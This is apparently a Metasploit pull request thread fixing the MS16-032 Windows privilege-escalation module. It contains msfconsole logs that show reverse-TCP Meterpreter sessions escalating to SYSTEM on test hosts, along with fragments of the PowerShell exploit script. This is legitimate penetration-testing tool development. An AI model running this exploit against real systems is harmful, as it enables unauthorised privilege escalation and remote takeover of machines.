### PR TITLE
Fix exploit/windows/local/ms16_032_secondary_logon_handle_privesc

### PR DESCRIPTION
**Pull request by llebout**
- Powershell script was outdated.
  Updated from https://www.exploit-db.com/exploits/39719
    
- Powershell script was buggy when current directory
  was set to e.g. C:\ProgramData. (Get-Item Error)
  Fixed.
    
- Stager was being dropped to current directory, but
  it is not guaranteed that we always have permission
  to write a file there. Use %TEMP% instead.

- Exploit only seems to work when executed under
  a powershell of the same architecture as the
  host. (Not WOW64)
  This module now ensures that no matter the
  architecture of the meterpreter, a powershell
  of the same architecture as the host is being
  run. (Using Sysnative directory when on WOW64)

- Stager was broken, now generating stager with Rex
  and dropping stager as `.ps1` instead of `.txt`.
    
  Ideally the exploit should be rewritten to
  accept a shellcode payload directly or a smaller
  stager powershell should be created so that it
  fits in under 1024 bytes and can be fed directly
  to CreateProcessWithLogonW without dropping to
  disk.

For usage see initial PR: https://github.com/rapid7/metasploit-framework/pull/7006

### CODE REVIEW

**Comment by leo-lb** [comment]
This has been tested and can now be merged.

**Comment by leo-lb** [comment]
@space-r7 bug rather? It did not work at all.

**Comment by bcoles** [comment]
```
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 172.16.191.165:1337 
[*] Sending stage (206403 bytes) to 172.16.191.242
[*] Meterpreter session 2 opened (172.16.191.165:1337 -> 172.16.191.242:49160) at 2019-11-30 03:00:36 -0500

meterpreter > getuid
Server username: TEST\test
meterpreter > 
Background session 2? [y/N]  
msf5 exploit(multi/handler) > use exploit/windows/local/ms16_032_secondary_logon_handle_privesc 
msf5 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set target 1
target => 1
msf5 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set lhost 172.16.191.165
lhost => 172.16.191.165
msf5 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set lport 1337
lport => 1337
msf5 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set session 2
session => 2
msf5 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > run

[*] Started reverse TCP handler on 172.16.191.165:1337 
[*] PS1 loaded from /root/Desktop/metasploit-framework/data/exploits/CVE-2016-0099/cve_2016_0099.ps1
[*] Writing payload file, C:\Users\test\AppData\Local\Temp\fRUxqYAz.ps1...
[*] Compressing script contents...
[+] Compressed size: 3540
[*] Executing exploit script...
	 __ __ ___ ___   ___     ___ ___ ___ 
	|  V  |  _|_  | |  _|___|   |_  |_  |
	|     |_  |_| |_| . |___| | |_  |  _|
	|_|_|_|___|_____|___|   |___|___|___|
	                                    
	               [by b33f -> @FuzzySec]

[?] Operating system core count: 2
[>] Duplicating CreateProcessWithLogonW handle
[?] Done, using thread handle: 1148

[*] Sniffing out privileged impersonation token..

[?] Thread belongs to: svchost
[+] Thread suspended
[>] Wiping current impersonation token
[>] Building SYSTEM impersonation token
[?] Success, open SYSTEM token handle: 1144
[+] Resuming thread..

[*] Sniffing out SYSTEM shell..

[>] Duplicating SYSTEM token
[>] Starting token race
[>] Starting process race
[!] Holy handle leak Batman, we have a SYSTEM shell!!

[*] Sending stage (206403 bytes) to 172.16.191.242
[*] Meterpreter session 3 opened (172.16.191.165:1337 -> 172.16.191.242:49161) at 2019-11-30 03:01:26 -0500

^C[-] Exploit failed [user-interrupt]: Interrupt 
[-] run: Interrupted
msf5 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > sessions -i 3
[*] Starting interaction with 3...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : TEST
OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 4
Meterpreter     : x64/windows
meterpreter > 
```

**Comment by bcoles** [comment]
It would be nice to also improve the `check` method, beyond checking that the target OS is Windows.

The number of processor cores would be a good check, which can be achieved with something like this, although perhaps not the cleanest approach:

```ruby
    res = psh_exec 'if($([System.Environment]::ProcessorCount) -gt 1) { echo("true") }'
    unless res.include? 'true'
      vprint_error 'Target system has an insufficient number of processor cores'
      return CheckCode::Safe
    end
```

This also requires the `Msf::Post::Windows::Powershell` mixin.

**Comment by leo-lb** [comment]
@bcoles Well, I do not know the technical specifics of that vulnerability. I do not see a straightforward way to accurately check if a target is vulnerable other than actually testing the exploit here.

File: data/exploits/CVE-2016-0099/cve_2016_0099.ps1 [hunk 1]
```diff
@@ -1,347 +1,370 @@
...
+	echo "`n[?] Operating system core count: $([System.Environment]::ProcessorCount)"
+	if ($([System.Environment]::ProcessorCount) -lt 2) {
+		echo "[!] This is a VM isn't it, race condition requires at least 2 CPU cores, exiting!`n"
+		Return
+	}
+	
+	echo "[>] Duplicating CreateProcessWithLogonW handle"
+	$hThread = Get-ThreadHandle
+	
+	# If no thread handle is captured, the box is patched
```
Comment (leo-lb) [inline data/exploits/CVE-2016-0099/cve_2016_0099.ps1]: Judging from that comment, the `Get-ThreadHandle` function could be used as a check method.

Comment (leo-lb) [inline data/exploits/CVE-2016-0099/cve_2016_0099.ps1]: Judging from that comment, the Get-ThreadHandle function could be used as a check method.

**Comment by leo-lb** [comment]
@bcoles Do you know if there's a way to easily load and execute the function of a script, with say, Meterpreter's powershell module?

**Comment by bcoles** [comment]
> 
> 
> @bcoles Well, I do not know the technical specifics of that vulnerability. I do not see a straightforward way to accurately check if a target is vulnerable other than actually testing the exploit here.

The number of processor cores would be a good start. The Powershell code will refuse to proceed with less than two cores.

> 
> 
> @bcoles Do you know if there's a way to easily load and execute the function of a script, with say, Meterpreter's powershell module?

`Msf::Post::Windows::Powershell` defines a `psh_exec` method. This might be what you're looking for. The Powershell commands are parsed on command line and has a max length of `8100`. If the command length is too large, this method calls `stage_cmd_env` which splits the script into chunks.

Although, re-reading your question, I'm guessing you're talking about directly invoking the `Get-ThreadHandle` function from the ps1 script. The script is rather large. For a `check` method, it would be cleaner to send and execute only the required components, if possible.

**Comment by leo-lb** [comment]
@bcoles Sorry for extended delay. Added the code you suggested, though, it's quite unsatisfying as a check.

**Comment by bcoles** [comment]
> 
> 
> @bcoles Sorry for extended delay. Added the code you suggested, though, it's quite unsatisfying as a check.

Agree, but better than nothing.

Looks like the module was chmoded executable. Also, there's a rogue space at EOL on line 77.

```
[*] Running msftidy.rb in ./.git/hooks/post-merge mode
--- Checking new and changed module syntax with tools/dev/msftidy.rb ---
modules/exploits/windows/local/ms16_032_secondary_logon_handle_privesc.rb - [ERROR] Module should not be executable (+x)
modules/exploits/windows/local/ms16_032_secondary_logon_handle_privesc.rb:77 - [WARNING] Spaces at EOL
```

**Comment by leo-lb** [comment]
Done. Merge now?

**Comment by bcoles** [comment]
> 
> 
> Done. Merge now?

LGTM. @cdelafuente-r7 ?

**Comment by cdelafuente-r7** [comment]
Thanks for this contribution @leo-lb, and thanks @bcoles for your review.

Just one thing before it lands. I tested it against a Win7 (x86) and the execution seems to hang before reaching the cleanup code. The `powershell.exe` process on the target machine never terminates and the `r.channel.read` call blocks (https://github.com/rapid7/metasploit-framework/blob/756879d3d69c5bf938bb739786ae04e775fe5ead/modules/exploits/windows/local/ms16_032_secondary_logon_handle_privesc.rb#L161).

this results in a timeout exception. However, the payload successfully executes.
```
...
[*] Sending stage (180291 bytes) to 192.168.0.29
[*] Meterpreter session 7 opened (192.168.0.29:4444 -> 192.168.0.29:60258) at 2020-01-21 23:52:58 +0100
[-] Exploit failed [user-interrupt]: Rex::TimeoutError Operation timed out.
[-] run: Interrupted
msf5 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > sessions -i 7
[*] Starting interaction with 7...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
```

It looks like something is going on with the `Return` statement in the PSH script (https://github.com/rapid7/metasploit-framework/blob/756879d3d69c5bf938bb739786ae04e775fe5ead/data/exploits/CVE-2016-0099/cve_2016_0099.ps1#L357).

**Comment by cdelafuente-r7** [comment]
Not sure if the PSH script can be improved to properly terminate the `powershell.exe` process. If not, one idea would be to echo some random sentinel string right before the `Return` in the PSH script so we know it has finished. This random value can be added using `gsub`, the same way it is done for other values: https://github.com/rapid7/metasploit-framework/blob/756879d3d69c5bf938bb739786ae04e775fe5ead/modules/exploits/windows/local/ms16_032_secondary_logon_handle_privesc.rb#L126
(thanks @acammack-r7 for the heads up)

**Comment by leo-lb** [comment]
@cdelafuente-r7

Network/meterpreter bug?
I do not know the specifics of that exploit or PowerShell so you're out of luck with me here, unfortunately.

**Comment by cdelafuente-r7** [comment]
@leo-lb , I added this workaround and submitted a PR to your branch: https://github.com/leo-lb/metasploit-framework/pull/1/files
Please, let me know what you think?
Thanks!

**Comment by leo-lb** [comment]
@cdelafuente-r7

Did you test it? Does it solve the problem in any way?
I don't see how that echo'ing would be executed and not the Return statement.

**Comment by cdelafuente-r7** [comment]
I tested with the same setup (Win7 x86) and it does not timeout anymore. The cleanup code is executed correctly:
```
msf5 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > rerun
[*] Reloading module...

[*] Started reverse TCP handler on 192.168.0.29:4444
[+] Compressed size: 1016
[*] Writing payload file, C:\Users\test\AppData\Local\Temp\VcQPvY.ps1...
[*] Compressing script contents...
[+] Compressed size: 3580
[*] Executing exploit script...
	 __ __ ___ ___   ___     ___ ___ ___
	|  V  |  _|_  | |  _|___|   |_  |_  |
	|     |_  |_| |_| . |___| | |_  |  _|
	|_|_|_|___|_____|___|   |___|___|___|

	               [by b33f -> @FuzzySec]

[?] Operating system core count: 2
[>] Duplicating CreateProcessWithLogonW handle
[?] Done, using thread handle: 1232

[*] Sniffing out privileged impersonation token..

[?] Thread belongs to: svchost
[+] Thread suspended
[>] Wiping current impersonation token
[>] Building SYSTEM impersonation token
[?] Success, open SYSTEM token handle: 1228
[+] Resuming thread..

[*] Sniffing out SYSTEM shell..

[>] Duplicating SYSTEM token
[>] Starting token race
[>] Starting process race
[!] Holy handle leak Batman, we have a SYSTEM shell!!

DdjIiVq4qZIh1bS6gpsZmRX8zdKHO9Nq
[+] Executed on target machine.
[*] Sending stage (180291 bytes) to 192.168.0.29
[+] Deleted C:\Users\test\AppData\Local\Temp\VcQPvY.ps1
[*] Meterpreter session 18 opened (192.168.0.29:4444 -> 192.168.0.29:57005) at 2020-01-24 12:53:54 +0100

meterpreter >
```

However, the Powershell process on the Windows target still does not properly terminate. This workaround will only let the module to continue and cleanup. I also tested with a simple command execution and got the same result. So, it doesn't seem to be related to meterpreter.

**Comment by leo-lb** [comment]
@cdelafuente-r7 

OK. Merged your changes. I am very unhappy with this solution but unfortunately I'm too clueless about PowerShell and/or the exploit itself to investigate. Neither do I run Windows or an x86 machine anymore at this time, so I'm not well equipped.

I guess you can merge it now?

**Comment by cdelafuente-r7** [comment]
@leo-lb! I did more tests and, with this workaround, I found out the session doesn't get created on every execution. Apparently, the clean-up code (`rm_f(@upfile)`) might be executed too soon. So, I moved it to the `cleanup` method, which ensures the clean-up is done after the session is created. If necessary, the `WfsDelay` advanced option can be adjusted to make sure the module will wait long enough before cleaning up. On my test environment, the default value was enough.

Here is the PR on your branch: https://github.com/leo-lb/metasploit-framework/pull/2

**Comment by cdelafuente-r7** [comment]
@leo-lb , thank you for merging this PR and for your contribution. I'm landing it.

**Comment by cdelafuente-r7** [comment]
# Release Notes
The exploit/windows/local/ms16_032_secondary_logon_handle_privesc module was using an outdated Powershell script and a broken stager. It was also only working when executed under a Powershell of the same architecture as the host. This fix updates the Powershell script, which is now dropped in the %TEMP% directory, and changes the way the stager is generated. This also ensures that no matter the architecture of the meterpreter, a Powershell of the same architecture as the host is being run.

**Pull request merged**